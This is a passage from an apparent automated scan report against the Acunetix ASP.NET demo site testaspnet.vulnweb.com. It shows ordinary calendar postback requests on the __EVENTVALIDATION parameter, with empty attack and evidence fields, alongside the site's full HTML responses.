href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8530&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgDAg3%2FpUNsIZGRkMZ81PPJmNUaGP2YTqJmiKKa1IkA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKA06ySAwLQp%2BbjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2%2F3gkC5p2%2F3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC%2B6SdxQ8C%2B6SdxQ8C%2B6SxmAcC%2B6SxmAcC%2B6SlPwL7pKU%2FAvuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk%2FawJAvuk%2FawJAvukkcMCAvukkcMCAtzL4%2BgFAtzL4%2BgFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv%2FkPAtzLv%2FkPAtzL050HAtzL050HAtzLxzAC3MvHMALcy%2FvXCQLcy%2FvXCQLcy%2B%2FqAgLcy%2B%2FqAgLcy8PTDwLcy8PTDwLcy%2Ff2CALcy%2Ff2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA8oPhSk5JBeUjQH61ykA7MfTt6yn
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:19:29 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgDAg3/pUNsIZGRkMZ81PPJmNUaGP2YTqJmiKKa1IkA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKA06ySAwLQp+bjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2/3gkC5p2/3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC+6SdxQ8C+6SdxQ8C+6SxmAcC+6SxmAcC+6SlPwL7pKU/Avuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk/awJAvuk/awJAvukkcMCAvukkcMCAtzL4+gFAtzL4+gFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv/kPAtzLv/kPAtzL050HAtzL050HAtzLxzAC3MvHMALcy/vXCQLcy/vXCQLcy+/qAgLcy+/qAgLcy8PTDwLcy8PTDwLcy/f2CALcy/f2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA8oPhSk5JBeUjQH61ykA7MfTt6yn" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:White" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1115 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,115 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8321&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgAALt%2BtrNoIZGRkhX%2FIzR4tnDRisTWssHRwKfKLOVM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKA89z0DgLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gJEjSnDiPBUZ7v9n9iHFjcX1NkjFQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:29:15 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgAALt+trNoIZGRkhX/IzR4tnDRisTWssHRwKfKLOVM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKA89z0DgLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gJEjSnDiPBUZ7v9n9iHFjcX1NkjFQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:White" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div 